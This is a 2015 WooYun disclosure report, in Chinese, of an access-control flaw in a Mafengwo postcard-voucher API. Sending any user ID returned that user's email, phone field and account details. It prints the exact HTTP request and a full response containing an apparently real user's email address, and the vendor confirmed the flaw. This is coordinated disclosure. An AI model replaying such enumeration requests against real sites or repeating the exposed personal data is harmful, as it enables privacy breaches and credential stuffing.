当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153956

漏洞标题:一不小心捅了马蜂窝(涉及全用户联系信息Email/Mobile等)

相关厂商:蚂蜂窝

漏洞作者: loli

提交时间:2015-11-18 16:42

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-18: 细节已通知厂商并且等待厂商处理中
2015-11-19: 厂商已经确认,细节仅向厂商公开
2015-11-29: 细节向核心白帽子及相关领域专家公开
2015-12-09: 细节向普通白帽子公开
2015-12-19: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

设计缺陷导致可获取任意用户信息包含email和手机号码,批量的话可能导致撞库等危害。

详细说明:

问题在明信片活动http://www.mafengwo.cn/postal/ticket.php 中转让明信片券的接口返回数据不严谨导致,随便找个ID测试,这位编辑ID为388631:

BG.png


输入用户ID抓包:

bg2.png


请求包:

POST /ajax/ajax_get_user.php HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: identity
Content-Length: 10
User-Agent: Dalvik/1.6.0
Host: www.mafengwo.cn
uid=388631


响应包:

{"payload":{"ret":1,"user_info":{"id":388631,"name":"\u603b\u7f16\u8f91\u65f6\u95f4","pass":"","email":"sweetcard0064@sina.com","score":3928,"flag":0,"ctime":"2009-11-09 17:38:44","mtime":"2015-10-26 13:59:34","gender":0,"province":"","city":"\u5317\u4eac","logo":"mfwStorage5\/M00\/79\/26\/wKgB3FYtwUaAJ22xAAAbWhJ0T8U441.head.png","fromid":"","verify":1,"verifycode":"695556662691","lasttime":"0000-00-00 00:00:00","intro":"\u603b\u4e4b\u5c31\u662f\u7f16\u8f91\u5566","gotime":"0000-00-00","backtime":"0000-00-00","destination":"","denyinfomsg":0,"forbid":0,"msn":"","coin":1285270,"xuid":0,"homecss":"35","viplevel":15,"name_index":"24635 32534 36753 26102 38388","from_url":"","mobile":"","active_mail":"sweetcard0064@sina.com","is_sina":0,"is_shop":"0","mailsendflg":1,"is_sohu":0,"is_kx001":0,"commonmail":1,"is_msn":0,"is_qq":0,"local_area":"","is_org":0,"bg_url":"","is_360":0,"is_qplus":0,"mailhuixuan":1,"logo_16":"http:\/\/file20.mafengwo.net\/M00\/79\/26\/wKgB3FYtwUaAJ22xAAAbWhJ0T8U441.head.w16.png"}},"resource":{"css":[],"js":[]}}


响应包里包含了用户用户激活的email地址和手机号码(第一眼看到pass字段时差点尿了。。)

漏洞证明:

来个美女证明下:

B2D488CF-5B99-4D6E-9B42-71BD65209809.png


111.png

修复方案:

限制下接口吧.

版权声明:转载请注明来源 loli@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-19 14:35

厂商回复:

非常感谢反馈,问题在排查解决中。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-11-18 16:58 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:430 漏洞数:123 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    这个标题我给20分

  2. 2015-11-19 16:33 | looyun ( 实习白帽子 | Rank:52 漏洞数:12 )

    哈哈,标题有意思。。

  3. 2016-01-12 17:35 | von ( 路人 | Rank:2 漏洞数:1 | 一个帅字贯穿了我的一生~)

    2333333333333